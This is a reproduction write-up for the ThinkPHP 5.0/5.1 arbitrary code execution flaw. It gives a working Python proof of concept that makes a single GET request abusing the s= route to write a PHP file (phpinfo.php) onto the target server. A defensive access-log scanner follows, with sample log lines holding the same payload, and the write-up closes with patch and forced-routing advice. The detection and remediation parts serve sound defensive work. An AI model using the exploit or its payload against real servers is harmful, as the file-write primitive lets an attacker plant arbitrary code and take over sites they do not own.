ThinkPHP Arbitrary Code Execution Vulnerability Reproduction
1. Vulnerability description
Because the ThinkPHP framework does not validate controller names strictly enough, an attacker can execute arbitrary malicious code on the server when forced routing is not enabled.
Local reproduction confirmed that an attacker can exploit the vulnerability and execute arbitrary code with a single HTTP GET request. Executing phpinfo() is used as the example.
2. Affected versions
ThinkPHP 5.0.x < 5.0.23
ThinkPHP 5.1.x < 5.1.31
3. Reproduction
Set up the environment with Docker and start it.
Visit 192.168.1.93:8181
Construct the PoC:
#!/usr/bin/env python
#coding:utf-8
import sys
import requests

def tpgetshell(url):
    # Browser-like headers so the request looks like ordinary traffic
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cache-Control": "max-age=0",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36",
    }
    # A single GET request is enough; the response is not checked, so the
    # success message below is printed unconditionally
    r = requests.get(url=url, headers=headers)
    print("phpinfo写入成功")
    print("shell url:" + sys.argv[1] + "/phpinfo.php")

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("python http://www.xxx.com/")
    else:
        # The route in the s parameter names a fully qualified class instead of a controller
        poc = "/?s=index/\\think\\template\\driver\\file/write?cacheFile=phpinfo.php&content=%3C?php%20phpinfo();?%3E"
        url = sys.argv[1] + poc
        tpgetshell(url)
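The request the PoC sends is easy to recognise in web server access logs: a legitimate ThinkPHP 5 route is module/controller/action made of plain identifiers, while the exploit route carries a backslash-separated PHP namespace in the controller position. The following Python script is an added example written for this page (it is not part of the original post or of ThinkPHP) that scans access-log lines for such routes. The log lines, IP addresses and timestamps are constructed samples; the helper names extract_route, is_namespace_route and scan_log are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines in combined log format (not real traffic).
# Line 2 carries the same request the PoC on this page sends; line 3 is that
# route as a web server may record it, with the backslashes percent-encoded;
# lines 1 and 4 are benign.
SAMPLE_LOG = r"""192.168.1.10 - - [10/Dec/2018:10:00:01 +0800] "GET /?s=index/index/index HTTP/1.1" 200 512
192.168.1.10 - - [10/Dec/2018:10:00:02 +0800] "GET /?s=index/\think\template\driver\file/write?cacheFile=phpinfo.php&content=%3C?php%20phpinfo();?%3E HTTP/1.1" 200 128
192.168.1.11 - - [10/Dec/2018:10:00:03 +0800] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write HTTP/1.1" 200 128
192.168.1.12 - - [10/Dec/2018:10:00:04 +0800] "POST /index.php/index/user/login HTTP/1.1" 302 0
"""

# Combined log format: client ip, identd, user, [timestamp], "METHOD target HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def extract_route(target: str):
    """Return the ThinkPHP route carried by a request target, or None.

    ThinkPHP 5 accepts the route either as the 's' query parameter
    (/?s=module/controller/action) or as PATH_INFO after index.php.
    """
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    if "s" in qs:
        return qs["s"][0]
    if "index.php/" in parts.path:
        return parts.path.split("index.php/", 1)[1]
    return None


def is_namespace_route(route: str) -> bool:
    """True when any route segment contains a backslash after decoding.

    A backslash means the caller is naming a fully qualified PHP class
    instead of a controller, which is exactly what this bug lets through.
    """
    decoded = route
    for _ in range(2):  # tolerate double percent-encoding
        decoded = unquote(decoded)
    route_part = decoded.split("?", 1)[0]  # drop any trailing ?param=... tail
    return "\\" in route_part


def scan_log(text: str):
    """Return (ip, status, route) for every request whose route names a namespace."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        route = extract_route(m.group("target"))
        if route is not None and is_namespace_route(route):
            hits.append((m.group("ip"), int(m.group("status")), route))
    return hits


if __name__ == "__main__":
    for ip, status, route in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} route={route}")
```

Run it against a real access log by passing the file contents to scan_log; a 200 status on a flagged request is the case to investigate first, since it means the framework accepted the route. The durable fix is the one the description implies: upgrade to 5.0.23 / 5.1.31 or later, and enable forced routing (the url_route_must setting in the ThinkPHP 5 config) so that only explicitly registered routes are dispatched.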
Test: